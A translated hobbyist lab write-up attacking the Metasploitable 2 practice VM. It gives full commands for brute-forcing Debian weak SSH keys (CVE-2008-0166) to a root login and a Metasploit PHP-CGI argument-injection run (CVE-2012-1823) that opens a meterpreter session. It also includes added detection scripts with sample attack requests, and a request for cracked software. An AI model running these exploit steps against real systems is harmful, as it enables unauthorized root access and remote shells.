Metasploitable 2 c4rp3nt3r test notes
Metasploit recently released Metasploitable 2, a Linux system meant for practice. It is built on Ubuntu 8.04 and stuffed with all kinds of vulnerabilities, which perfectly meets the ever-growing need of us broke script kiddies to show off and daydream.
Download: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Metasploit's official user guide: https://community.rapid7.com/docs/DOC-1875
Ignorant me had never played with anything this fancy, so I downloaded it and gave it a spin.
A round of frantic scanning with nmap and Nessus turned up N services and N high-risk vulnerabilities.
Metasploitable is like a set of practice problems: you should pick the ones you haven't mastered, otherwise there is no point doing them. The many one-shot vulnerabilities and backdoors aren't very interesting; what we care about is the stuff whose outcome we aren't sure of. Let's start with the vulnerability the scan found on port 22.
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness CVE-2008-0166
Since it's Metasploitable, let's have Metasploit take the stage.
Search for an exploit:
msf > search cve:2008-0166
msf >
Damn, there really isn't one. Metasploit Pro probably has this exploit, but a broke guy like me can't afford it; if anyone has a cracked copy, I'm seriously asking.
Fine, a broke guy has to fall back on exploit-db. For a local search, run svn update first.
root@bt:/pentest/exploits/exploitdb# ./searchsploit openssl
--------------------------------------------------------------------------- -------------------------
Brute forcer for OpenSSL ASN.1 parsing bugs (<=0.9.6j <=0.9.7b) /multiple/dos/146.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c) /linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit /multiple/dos/4773.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby) /multiple/remote/5632.rb
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python) /linux/remote/5720.py
OpenSSL <= 0.9.8k /multiple/dos/8720.c
OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS Exploit /multiple/dos/8873.c
OpenSSL remote DoS /linux/dos/12334.c
OpenSSL ASN1 BIO Memory Corruption Vulnerability /multiple/dos/18756.txt
Pick the Python exploit and open it; you'll find considerate usage instructions in the header.
# Autor: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
# 2. Extract it to a directory
# 3. Execute the python script
# - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
# - execute: python exploit.py (without parameters) to display the help
# - if the key is found, the script shows something like that:
# Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
# Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
OK, let's get to it.
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
root@bt:~/Desktop# python 5720.py
-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
./exploit.py <dir> <host> <user> [[port] [threads]]
<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash
<host>: The victim host
<user>: The user of the victim host
[port]: The SSH port of the victim host (default 22)
[threads]: Number of threads (default 4) Too big numer is bad
root@bt:~/Desktop# python 5720.py ~/Desktop/rsa/2048/ 192.168.1.103 root
After waiting until the flowers wilted, it reported success.
Quick, try it out.
root@bt:~/Desktop# ssh -lroot -p22 -i /root/Desktop/rsa/2048//57c3115d77c56390332dc5c49978627a-5429 192.168.1.103
Last login: Thu Jun 21 21:06:33 2012 from 192.168.1.100
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
To access official Ubuntu documentation, please visit:
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
Holy crap, it actually logged in. That was way too easy.
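What made this work is that the affected Debian OpenSSL seeded its PRNG so poorly that every key it produced came from a small, enumerable set, which is exactly what the precomputed key tarball above contains. The defender's counterpart is to audit every authorized_keys file against a blocklist of fingerprints of known-weak keys, which is what Debian's ssh-vulnkey did. The script below is an added example, not code from the original post, Metasploitable or Debian: it parses authorized_keys entries, computes OpenSSH MD5 fingerprints and flags blocklist matches. The two keys and the blocklist are constructed for illustration and are not real weak keys.

```python
"""Added example: audit authorized_keys against fingerprints of known-weak keys (CVE-2008-0166)."""
import base64, hashlib, struct

def rsa_blob(e: int, n: int) -> bytes:
    # wire-format ssh-rsa public key: string "ssh-rsa", mpint e, mpint n (authorized_keys stores it base64)
    def s(b): return struct.pack(">I", len(b)) + b
    def mpint(v): return s(v.to_bytes((v.bit_length() + 8) // 8, "big"))  # spare byte keeps the sign positive
    return s(b"ssh-rsa") + mpint(e) + mpint(n)

def md5_fingerprint(blob: bytes) -> str:
    # OpenSSH-style MD5 fingerprint: 16 colon-separated hex bytes
    return ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())

def parse_authorized_keys(text: str):
    # yield (line_no, blob); blob is None when the entry cannot be decoded
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split()
        if not fields or fields[0].startswith("#"):
            continue
        # options such as from="..." may precede the key type
        idx = next((i for i, f in enumerate(fields) if f.startswith(("ssh-", "ecdsa-"))), None)
        try:
            yield line_no, base64.b64decode(fields[idx + 1], validate=True)
        except (TypeError, IndexError, ValueError):
            yield line_no, None

def audit(text: str, blocklist: set) -> list:
    # (line_no, reason) for every undecodable entry or blocklisted key
    findings = []
    for line_no, blob in parse_authorized_keys(text):
        if blob is None:
            findings.append((line_no, "unparseable entry"))
        elif (fp := md5_fingerprint(blob)) in blocklist:
            findings.append((line_no, "known weak key " + fp))
    return findings

def _fake_modulus(label: bytes) -> int:
    # deterministic 2048-bit odd number standing in for a modulus; not a real RSA key
    return int.from_bytes(hashlib.sha256(label).digest() * 8, "big") | (1 << 2047) | 1

# constructed sample data: in practice BLOCKLIST comes from the distribution's weak-key lists
WEAK_BLOB = rsa_blob(65537, _fake_modulus(b"constructed weak key"))
GOOD_BLOB = rsa_blob(65537, _fake_modulus(b"constructed good key"))
BLOCKLIST = {md5_fingerprint(WEAK_BLOB)}
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys",
    "ssh-rsa " + base64.b64encode(GOOD_BLOB).decode() + " alice@host",
    'from="10.0.0.0/8" ssh-rsa ' + base64.b64encode(WEAK_BLOB).decode() + " backup@host",
    "ssh-rsa not-base64!! broken@host",
])
```

Running audit(SAMPLE_AUTHORIZED_KEYS, BLOCKLIST) flags line 3 as a known weak key and line 4 as unparseable; the good key on line 2 passes.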
Let's keep going, skipping the exploitation methods other people have already published.
Let's see what's on the web side. There is a vulnerable phpMyAdmin, a wiki application, and Mutillidae and DVWA, which exist specifically for practicing web vulnerabilities.
The practice apps are too easy, so I'll skip them; TWiki isn't much fun either; Nessus already found the MySQL password earlier, and the web apps aren't interesting. Let's scan for directories and see what turns up.
First, a quick pass with a lightweight Perl scanner. The results:
++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++++++++++++
Let's look at phpinfo.php. A certain international *** said there was nothing there but phpinfo.php; in fact, sometimes a single phpinfo.php is enough to get a shell.
A look showed PHP was running as CGI. Visiting it: hey, isn't that the PHP CGI Argument Injection vulnerability?
Time to bring Metasploit back out. You're the star here, how about putting in some effort?
msf > search cve:2012-1823
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/php_cgi_arg_injection 2012-05-03 excellent PHP CGI Argument Injection
This time there really is one. OK, it's Metasploit time.
msf exploit(php_cgi_arg_injection) > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > set RHOST 192.168.1.103
msf exploit(php_cgi_arg_injection) > set TARGETURI /phpinfo.php
TARGETURI => /phpinfo.php
msf exploit(php_cgi_arg_injection) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
msf exploit(php_cgi_arg_injection) > exploit
[*] Started bind handler
[*] Sending stage (39217 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.100:35125 -> 192.168.1.103:4444) at 2012-06-22 11:38:21 +0800
Server username: www-data (33)
Good, Metasploit succeeded once. At least the thing earns the name Metasploitable.
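The module above works because php-cgi treated a query string containing no '=' as command-line options rather than GET parameters. The PHP project's published mod_rewrite workaround therefore rejected any request whose query string had no '=' but contained a dash, literal or as %2d. Below is an added example, not code from the original post or Metasploit, that applies the same rule to Apache combined-format access log lines so that earlier attempts can be found after the fact; the log lines are constructed.

```python
"""Added example: find CVE-2012-1823 style requests in Apache combined access logs."""
import re

# client, ident, user, [time], "method target protocol", status, size, ... (rest ignored)
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

def is_cgi_arg_injection(target: str) -> bool:
    # Same test as the PHP project's published mod_rewrite workaround, applied to the raw
    # (still URL-encoded) query string: no '=' anywhere, but a dash, literal or as %2d.
    # php-cgi parsed such a query string as command-line options instead of GET parameters.
    if "?" not in target:
        return False
    query = target.split("?", 1)[1]
    return "=" not in query and ("-" in query or "%2d" in query.lower())

def scan_access_log(lines) -> list:
    # (client, time, target, status) for every request matching the rule
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_cgi_arg_injection(m["target"]):
            hits.append((m["client"], m["time"], m["target"], int(m["status"])))
    return hits

# constructed sample log lines; addresses follow the lab network used in the post
SAMPLE_LOG = [
    '192.168.1.50 - - [22/Jun/2012:11:30:01 +0800] "GET /phpinfo.php HTTP/1.1" 200 51233 "-" "Mozilla/5.0"',
    '192.168.1.50 - - [22/Jun/2012:11:30:05 +0800] "GET /index.php?page=home&id=3 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    '192.168.1.100 - - [22/Jun/2012:11:38:19 +0800] "GET /phpinfo.php?-s HTTP/1.1" 200 8831 "-" "Mozilla/4.0"',
    '192.168.1.100 - - [22/Jun/2012:11:38:20 +0800] "GET /phpinfo.php?%2Ds HTTP/1.1" 200 8831 "-" "Mozilla/4.0"',
    '192.168.1.51 - - [22/Jun/2012:11:40:00 +0800] "GET /search.php?q=a-b HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '192.168.1.51 - - [22/Jun/2012:11:41:00 +0800] "GET /index.php?debug-mode HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, when, target, status in scan_access_log(SAMPLE_LOG):
        print(f"{when} {client} {target} -> {status}")
```

The last sample shows the rule's known false positive, a legitimate dash-containing query with no '=', which is why a rule like this is a stopgap beside patching php-cgi rather than a replacement for it.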
I also tested the web vulnerabilities inside afterwards, but they weren't interesting so I won't write them up. When will someone in China build a similar system? Put domestic CMSes on it, skip the piles of overflows and weak passwords, and turn it into a game or a competition. That would actually be fun.